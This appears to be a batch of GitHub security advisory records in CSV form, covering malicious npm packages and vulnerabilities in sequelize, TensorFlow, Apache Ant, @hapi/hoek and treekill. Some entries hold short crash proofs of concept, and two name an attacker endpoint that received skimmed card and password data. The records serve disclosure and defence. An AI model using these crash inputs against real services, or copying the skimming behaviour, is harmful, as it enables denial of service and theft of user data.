+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'babel-loqder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1350'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4p6w-m9wc-c9c9,2022-02-08T22:06:02Z,2020-09-14T18:13:29Z,,['CVE-2020-1945'],Sensitive Data Exposure in Apache Ant,Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1'}, {'fixed': '1.9.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1945'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d08a96ba9de8aa435f32944e8b2867c368a518d4ff57782e3637335@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r107ea1b1a7a214bc72fe1a04207546ccef542146ae22952e1013b5cc@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1863b9ce4c3e4b1e5b0c671ad05545ba3eb8399616aa746af5dfe1b1@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1a9c992d7c8219dc15b4ad448649f0ffdaa88d76ef6a0035c49455f5@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b32c76afffcf676e13ed635a3332f3e46e6aaa7722eb3fc7a28f58e@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dc8518dc99c42ecca5ff82d0d2de64cd5d3a4fa691eb9ee0304781e@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2306b67f20c24942b872b0a41fbdc9330e8467388158bcd19c1094e0@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2704fb14ce068c64759a986f81d5b5e42ab434fa13d0f444ad52816b@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3cea0f3da4f6d06d7afb6c0804da8e01773a0f50a09b8d9beb2cda65@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b2904d64affd4266cd72ccb2fc3927c1c2f22009f183095aa46bf90@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ca33fad3fb39d130cda287d5a60727d9e706e6f2cf2339b95729490@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5dfc77048b1f9db26622dce91a6edf083d499397256594952fad5f35@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e1cdd79f019162f76414708b2092acad0a6703d666d72d717319305@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6030d34ceacd0098538425c5dac8251ffc7fd90b886942bc7ef87858@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6970d196cd73863dafdbc3a7052562deedd338e3bd7d73d8171d92d6@%3Ccommits.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e295d792032ec02b32be3846c21a58857fba4a077d22c5842d69ba2@%3Ctorque-dev.db.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6edd3e2cb79ee635630d891b54a4f1a9cd8c7f639d6ee34e75fbe830@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r815f88d1044760176f30a4913b4baacd06f3eae4eb662de7388e46d8@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e24abb7dd77cda14c6df90a377c94f0a413bbfcec90a29540ff8adf@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e592bbfc016a5dbe2a8c0e81ff99682b9c78c453621b82c14e7b75e%40%3Cdev.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95dc943e47a211d29df605e14f86c280fc9fa8d828b2b53bd07673c9@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra12c3e23b021f259a201648005b9946acd7f618a6f32301c97047967@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra12c3e23b021f259a201648005b9946acd7f618a6f32301c97047967@%3Cdev.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra12c3e23b021f259a201648005b9946acd7f618a6f32301c97047967@%3Cusers.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9dab34bf8625511f23692ad0fcee2725f782e9aad6c5cdff6cf4465@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raaeddc41da8f3afb1cb224876084a45f68e437a0afd9889a707e4b0c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb860063819b9c0990e1fbce29d83f4554766fe5a05e3b3939736bf2b@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8ec556f176c83547b959150e2108e2ddf1d61224295941908b0a81f@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbfe9ba28b74f39f46ec1bbbac3bef313f35017cf3aac13841a84483a@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc3c8ef9724b5b1e171529b47f4b35cb7920edfb6e917fa21eb6c64ea@%3Cdev.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc89e491b5b270fb40f1210b70554527b737c217ad2e831b643ead6bc@%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce099751721c26a8166d8b6578293820832831a0b2cb8d93b8efa081@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7dda48ff835f4d0293949837d55541bfde3683bd35bd8431e324538@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rda80ac59119558eaec452e58ddfac2ccc9211da1c65f7927682c78b1@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdaa9c51d5dc6560c9d2b3f3d742c768ad0705e154041e574a0fae45c@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re1ce84518d773a94a613d988771daf9252c9cf7375a9a477009f9735@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf07feaf78afc8f701e21948a06ef92565d3dff1242d710f4fbf900b2@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd346609527a79662c48b1da3ac500ec30f29f7ddaa3575051e81890@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EQBR65TINSJRN7PTPIVNYS33P535WM74/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RRVAWTCVXJMRYKQKEXYSNBF7NLSR6OEI/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-34'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4380-1/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00053.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/09/30/6'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/12/06/1'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-14T18:12:46Z', 'nvd_published_at': '2020-05-14T16:15:00Z'}"
+1.4.0,GHSA-fw4p-36j9-rrj3,2020-08-31T18:48:48Z,2020-09-03T20:25:33Z,,[],Denial of Service in sequelize,"Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
+
+The following proof-of-concept crashes the Node process:
+```
+const Sequelize = require('sequelize');
+
+const sequelize = new Sequelize({
+ dialect: 'sqlite',
+ storage: 'database.sqlite'
+});
+
+const TypeError = sequelize.define('TypeError', {
+ name: Sequelize.STRING,
+});
+
+TypeError.sync({force: true}).then(() => {
+ return TypeError.create({name: ""SELECT tbl_name FROM sqlite_master""});
+});
+```
+
+
+## Recommendation
+
+Upgrade to version 4.44.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.44.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/11877'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1142'}]","{'cwe_ids': ['CWE-248'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hq8g-qq57-5275,2020-08-31T18:43:13Z,2020-09-11T21:24:33Z,,[],SQL Injection in untitled-model,"All versions of `untitled-model` re vulnerable to SQL Injection. Query parameters are not properly sanitized allowing attackers to inject SQL statements and execute arbitrary SQL queries.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'untitled-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/507222'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/989'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h2jv-5v3f-7m7j,2021-01-14T15:57:07Z,2020-09-01T16:10:03Z,,['CVE-2016-10680'],Downloads Resources over HTTP in adamvr-geoip-lite,"Affected versions of `adamvr-geoip-lite` insecurely download resources over HTTP.
+
+In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. This could impact the integrity and availability of the data being used to make geolocation decisions by an application.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",[],"[{'package': {'ecosystem': 'npm', 'name': 'adamvr-geoip-lite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10680'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/283'}]","{'cwe_ids': ['CWE-311'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:17:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xwg3-gjxh-c8pm,2023-07-26T23:58:59Z,2020-09-03T19:14:32Z,,[],Malicious Package in ngx-context-menu,"Version 0.0.26 of `ngx-context-menu` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.0.25",[],"[{'package': {'ecosystem': 'npm', 'name': 'ngx-context-menu'}, 'versions': ['0.0.26']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1105'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mxjj-953w-2c2v,2021-08-26T15:16:46Z,2020-09-25T18:28:44Z,,['CVE-2020-15208'],Data corruption in tensorflow-lite,"### Impact
+When determining the common dimension size of two tensors, TFLite uses a `DCHECK` which is no-op outside of debug compilation modes:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442
+
+Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in both tensors.
+
+### Patches
+We have patched the issue in 8ee24e7949a20 and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mxjj-953w-2c2v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15208'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8ee24e7949a203d234489f9da2c5bf45a7d5157d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:59:45Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-c8h6-89q2-mgv8,2021-09-24T17:24:28Z,2020-09-01T19:55:48Z,,[],Malicious Package in dossier,"Version 0.0.4 of `dossier` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.4 of this module is found installed you will want to replace it with a version before or after 0.0.4. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dossier'}, 'versions': ['0.0.4']}]","[{'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-c8h6-89q2-mgv8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOSSIER-450994'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/625'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-657v-jjf8-83gh,2021-10-01T14:37:41Z,2020-09-03T23:14:55Z,,[],Malicious Package in jsmsha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsmsha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1295'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xmq7-7fxm-rr79,2021-08-26T15:14:11Z,2020-09-25T18:28:37Z,,['CVE-2020-15203'],Denial of Service in Tensorflow,"### Impact
+By controlling the `fill` argument of [`tf.strings.as_string`](https://www.tensorflow.org/api_docs/python/tf/strings/as_string), a malicious attacker is able to trigger a format string vulnerability due to the way the internal format use in a `printf` call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74
+
+This can result in unexpected output:
+```python
+In [1]: tf.strings.as_string(input=[1234], width=6, fill='-')
+Out[1]:
+In [2]: tf.strings.as_string(input=[1234], width=6, fill='+')
+Out[2]:
+In [3]: tf.strings.as_string(input=[1234], width=6, fill=""h"")
+Out[3]:
+In [4]: tf.strings.as_string(input=[1234], width=6, fill=""d"")
+Out[4]:
+In [5]: tf.strings.as_string(input=[1234], width=6, fill=""o"")
+Out[5]:
+In [6]: tf.strings.as_string(input=[1234], width=6, fill=""x"")
+Out[6]:
+In [7]: tf.strings.as_string(input=[1234], width=6, fill=""g"")
+Out[7]:
+In [8]: tf.strings.as_string(input=[1234], width=6, fill=""a"")
+Out[8]:
+In [9]: tf.strings.as_string(input=[1234], width=6, fill=""c"")
+Out[9]:
+In [10]: tf.strings.as_string(input=[1234], width=6, fill=""p"")
+Out[10]:
+In [11]: tf.strings.as_string(input=[1234], width=6, fill='m')
+Out[11]:
+```
+
+However, passing in `n` or `s` results in segmentation fault.
+
+### Patches
+We have patched the issue in 33be22c65d86256e6826666662e40dbdfe70ee83 and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xmq7-7fxm-rr79'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15203'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/33be22c65d86256e6826666662e40dbdfe70ee83'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-134', 'CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:34:02Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-22h7-7wwg-qmgg,2020-08-31T19:00:24Z,2020-09-04T17:56:39Z,,[],Prototype Pollution in @hapi/hoek,"Versions of `@hapi/hoek` prior to 8.5.1 and 9.0.3 are vulnerable to Prototype Pollution. The `clone` function fails to prevent the modification of the Object prototype when passed specially-crafted input. Attackers may use this to change existing properties that exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances.
+This issue __does not__ affect hapi applications since the framework protects against such malicious inputs. Applications that use `@hapi/hoek` outside of the hapi ecosystem may be vulnerable.
+
+
+## Recommendation
+
+Update to version 8.5.1, 9.0.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/hoek'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.3.2'}, {'fixed': '8.5.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/hoek'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1468'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-533p-g2hq-qr26,2020-08-31T18:59:07Z,2020-09-04T17:16:35Z,,[],Command Injection in treekill,"All versions of `treekill` are vulnerable to Command Injection. The package fails to sanitize values passed to the `kill` function. If this value is user-controlled it may allow attackers to run arbitrary commands in the server. The issue only affects Windows systems.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'treekill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/703415'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1433'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:07Z', 'nvd_published_at': None}"
